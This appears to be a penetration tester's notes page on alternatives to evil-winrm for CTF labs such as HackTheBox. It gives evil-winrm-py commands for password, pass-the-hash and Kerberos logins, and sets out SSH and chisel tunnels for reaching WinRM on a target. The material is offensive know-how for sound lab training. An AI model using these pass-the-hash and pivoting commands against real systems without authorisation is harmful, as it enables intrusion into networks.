Evil-WinRM Alternatives
Problem
evil-winrm works great in a pinch, but is often very buggy, so I've documented some workarounds that may be worth exploring.
Solutions
evil-winrm-py
Project GitHub: https://github.com/adityatelange/evil-winrm-py
sudo apt install gcc python3-dev libkrb5-dev krb5-pkinit krb5-userInstall prerequisite packages
pipx install evil-winrm-py[kerberos]Install evil-winrm-py in a dedicated virtual environment using pipx
Takes a while to install due to compiling Kerberos libraries, be patient!
evil-winrm-py -i 10.80.80.2 -u 'john.doe' -p 'P@$$word123!'Password authentication
evil-winrm-py -i 10.80.80.2 -u 'john.doe' -H 'd8e8fca2dc0f896fd7cb4cb0031ba249'Pass the hash authentication
KRB5_CCNAME='john.doe.ccache' evil-winrm-py -k -i 'DC01.ad.lab'Kerberos authentication
Port Forwarding to Windows Host
I have tried extensively to get PSWSMan to work with Kali Linux. The module is functional and cmdlets appear to work, but when running New-PSSession, the session never initializes and just hangs on the server.
At this point, the objective is just to get a functioning, native WSMan client with as little effort as possible
I've come to conclusion that the best way to go about getting a native WSMan client is to use port forwarding (e.g. SSH) and a Windows VM / host. The traffic from the native WSMan client on the Windows host will be tunneled through the SSH port forward and to the target.
What Would that Look Like?
Imagine you're working on a CTF box on some platform such as HackTheBox or TryHackMe ...
FORWARD SSH PORT FORWARDING
ssh from the Windows box and tunnel forward to target
ssh -i id_rsa -f -N -L 127.0.0.1:45985:target.htb:5985 user@kali-ip
____________ ____________ ____________
| | | | | |
| WINDOWS | | | | HTB |
| HOST | [+] =====[ SSH ]==== >> | KALI | [+]===[ HTB VPN ]=== >> | TARGET |
| | ^ | | | | | | |
'------------' | | '------------' | | '------------'
127.0.0.1:45985--' '----WinRM--------' '-> target.htb:5985
$s = New-PSSession `
-ComputerName 127.0.0.1 `
-Port 45985 `
-Credential (Get-Credential)
REVERSE SSH PORT FORWARDING
ssh into the Windows box and tunnel in reverse to target
ssh -i id_rsa -f -N -R 127.0.0.1:45985:target.htb:5985 user@windows-host-ip
____________ ____________ ____________
| | | | | |
| WINDOWS | | | | HTB |
| HOST | << =====[ SSH ]====[+] | KALI | [+]===[ HTB VPN ]=== >> | TARGET |
| | ^ | | | | | | |
'------------' | | '------------' | | '------------'
127.0.0.1:45985-' '-----WinRM--------' '-> target.htb:5985
$s = New-PSSession `
-ComputerName 127.0.0.1 `
-Port 45985 `
-Credential (Get-Credential)What if the WinRM port is bound to loopback on the target?
The left half of the solution nearly stays the same, but first, you need to setup a port forward between Kali and the target
1. CHISEL REVERSE PORT FORWARD
proxy the port to the WinRM server on the target loopback
sudo ./chisel \ Start-Job -ScriptBlock {
server --port 48080 \ C:\Windows\Tasks\chisel.exe client
--reverse & kali-ip:48080 R:5985:127.0.0.1:5985 }
____________ ____________ ____________
| | | | | |
| WINDOWS | | | | HTB |
| HOST | | KALI | << ===[ CHISEL ]===[+] | TARGET |
| | | | ^ | | |
'------------' '------------' | | '------------'
127.0.0.1:5985-' '-> target.htb:5985
2. SSH FORWARD PORT FORWARDING (OR REVERSE)
ssh into kali and forward to tcp/45985 on kali which
forwards traffic over chisel to tcp/5985 on the target
ssh -i id_rsa -f -N -L 127.0.0.1:45985:127.0.0.1:5985 user@kali-ip
____________ ____________ ____________
| | | | | |
| WINDOWS | | | | HTB |
| HOST | [+]=====[ SSH ]==== >> | KALI | << ===[ CHISEL ]===[+] | TARGET |
| | ^ | | | | | | |
'------------' | | '------------' | | '------------'
127.0.0.1:45985-' | 127.0.0.1:5985-' '-> target.htb:5985
| ^
$s = New-PSSession ` '--WinRM------'
-ComputerName 127.0.0.1 `
-Port 45985 `
-Credential (Get-Credential)PSWSMan
I'm only including this here, as I finally found the time to do some more testing and debugging to come up with some answers to making this work on Linux. However, I do not recommend this as a solution currently, as I've found the performance to be quite abysmal when Linux -> Windows.
See documentation here: https://notes.benheater.com/books/kali-optimizations/page/installing-native-winrm-client